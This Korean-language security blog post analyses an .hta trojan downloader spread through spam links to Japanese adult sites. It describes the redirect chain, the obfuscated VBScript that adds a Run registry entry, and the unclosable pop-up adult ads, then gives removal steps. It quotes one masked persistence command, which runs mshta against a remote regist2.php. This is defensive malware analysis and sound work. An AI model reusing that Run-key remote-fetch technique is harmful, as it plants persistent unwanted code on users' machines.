2009년경 알려진 내용과 큰 차이는 없지만 최근 유포되는 hta 확장자 파일을 이용한 감염 과정과 문제 해결 방법에 대해 자세하게 살펴보도록 하겠습니다.
스팸 메일 등을 통해 사용자가 특정 URL 링크를 통해 일본 성인 사이트에 접속하여 성인 동영상을 감상할 목적으로 사이트에서 제시하는 절차를 따를 경우 다음과 같은 hta 확장자 파일을 다운로드하게 됩니다.
해당 4cc4.hta(MD5 : e26043f79adccd87c33980bf003b3180) 파일에 대하여 Kaspersky 보안 제품에서는 Trojan-Downloader.HTA.Agent.bu (VirusTotal : 1/42) 진단명으로 진단되고 있습니다.
이제 사용자가 다운로드시 "실행"을 클릭하거나 "저장"을 클릭하여 PC에 파일을 다운로드한 후 직접 파일을 실행한 경우 어떤 절차에 따라 동작하는지 알아보겠습니다.
4cc4.hta 파일을 살펴보면 메타 태그(Meta Tag)를 이용하여 특정 사이트(regist1.php)로 자동 이동이 이루어지도록 구성되어 있습니다.
이동된 regist1.php 사이트는 Windows Script Host Runtime Library를 실행하도록 구성되어 있으며, 해당 페이지가 어떤 동작을 하는지 확인해 보겠습니다.
해당 페이지 소스를 확인해보면 VBScript를 통해 최종적으로 regist2.php를 노출시키도록 되어 있으며, 이 과정에서 난독화된 VBScript를 통해 RUN 레지스트리 값에 자신을 등록하여 시스템 시작시 자동으로 실행되도록 하였습니다.
또한 하단에서는 Windows Media Player를 이용하여 최초 광고를 동영상으로 구현하도록 구성되어 있는 것을 확인할 수 있습니다.
참고로 regist1.php 스크립트에 대하여 Kaspersky 보안 제품에서는 HEUR:Trojan.Script.Generic (VirusTotal : 1/43) 진단명으로 진단되고 있습니다.
최종적으로 regist2.php 페이지를 불러와 광고가 동작하게 되면 최초 광고는 바탕 화면에 그림과 같은 성인 동영상이 실행되며, 해당 페이지에 대하여 TrendMicro 보안 제품에서는 VBS_HTAPORN.SM10 (VirusTotal : 7/42) 진단명으로 진단되고 있습니다.
그 외에도 위와 같은 다양한 일본어로 작성된 성인 광고가 노출되며, 광고에 표시된 닫기(X) 버튼은 동작하지 않아서 광고를 쉽게 닫을 수 없도록 제작되어 있습니다.
해당 광고는 [C:\Windows\System32\mshta.exe] 파일을 이용하여 동작하므로, 광고 종료를 위해서는 Windows 작업 관리자에서 mshta.exe 프로세스를 수동으로 종료하시기 바랍니다.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- w**.high-quality-movie.com = mshta h**p://www.********-movies.com/regist2.php
※ 일부 인터넷 주소(URL)는 * 마크 처리를 하였습니다.
그 후에는 반드시 레지스트리 편집기(regedit)에서 시작 프로그램으로 등록된 키값을 찾아 추가로 삭제를 하셔야 합니다.
해당 악성코드의 경우 사용자들이 인터넷 상에서 다운로드되는 파일을 아무런 생각없이 실행하여 발생하는 경우라고 판단되므로 성인 사이트 등에서 제공하는 파일을 함부로 실행하여 고생하는 일이 없도록 주의하시기 바랍니다.